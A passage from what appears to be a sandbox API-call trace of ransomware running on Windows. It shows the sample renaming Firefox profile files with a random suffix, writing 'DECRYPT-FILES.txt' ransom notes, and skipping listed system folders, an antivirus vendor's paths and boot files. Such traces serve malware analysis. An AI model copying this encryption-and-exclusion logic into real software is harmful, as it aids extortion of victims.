lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.115] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.115] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.115] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.116] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.116] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.116] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.116] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 105 [0081.116] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.1Cii") returned 110 [0081.116] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.1Cii" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.1cii"), dwFlags=0x0) returned 1 [0081.117] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.118] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.118] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.118] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0081.118] lstrcmpW (lpString1="indexedDB", lpString2=".") returned 1 [0081.118] lstrcmpW (lpString1="indexedDB", lpString2="..") returned 1 [0081.118] lstrcatW (in: lpString1="indexedDB", lpString2="\\" | out: lpString1="indexedDB\\") returned="indexedDB\\" [0081.118] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Program Files") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch=":\\Windows") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Games\\") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Tor Browser\\") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\ProgramData\\") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0081.118] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\All Users") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\IETldCache\\") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\Local Settings\\") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="\\AppData\\Local") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="AhnLab") returned 0x0 [0081.119] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0081.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0081.119] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.119] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\jkbimi8.tmp") returned 110 [0081.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0081.123] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0081.123] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0081.123] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\DECRYPT-FILES.txt") returned 116 [0081.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0081.124] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0081.125] CloseHandle (hObject=0x464) returned 1 [0081.125] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0081.125] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*" [0081.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0081.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.125] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0081.125] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.125] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.125] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.125] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.125] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.125] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.125] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.126] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0081.126] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.126] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0081.126] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\jkbimi8.tmp" [0081.126] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.126] CloseHandle (hObject=0x0) returned 0 [0081.126] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.126] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0081.126] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0081.126] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0081.126] lstrcatW (in: lpString1="moz-safe-about+home", lpString2="\\" | out: lpString1="moz-safe-about+home\\") returned="moz-safe-about+home\\" [0081.126] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0081.126] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Program Files") returned 0x0 [0081.126] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch=":\\Windows") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Games\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Tor Browser\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\ProgramData\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\All Users") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\IETldCache\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\Local Settings\\") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="\\AppData\\Local") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="AhnLab") returned 0x0 [0081.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0081.127] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0081.127] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.127] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\jkbimi8.tmp") returned 130 [0081.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x468 [0081.127] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0081.127] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0081.127] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\DECRYPT-FILES.txt") returned 136 [0081.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0081.129] WriteFile (in: hFile=0x46c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0081.130] CloseHandle (hObject=0x46c) returned 1 [0081.130] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0081.130] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*" [0081.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8dd8 [0081.131] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.131] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.131] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="DECRYPT-FILES.txt") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0081.131] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0081.131] lstrlenW (lpString=".metadata") returned 9 [0081.131] lstrcmpiW (lpString1="metadata", lpString2="lnk") returned 1 [0081.131] lstrcmpiW (lpString1="metadata", lpString2="exe") returned 1 [0081.131] lstrcmpiW (lpString1="metadata", lpString2="sys") returned -1 [0081.131] lstrcmpiW (lpString1="metadata", 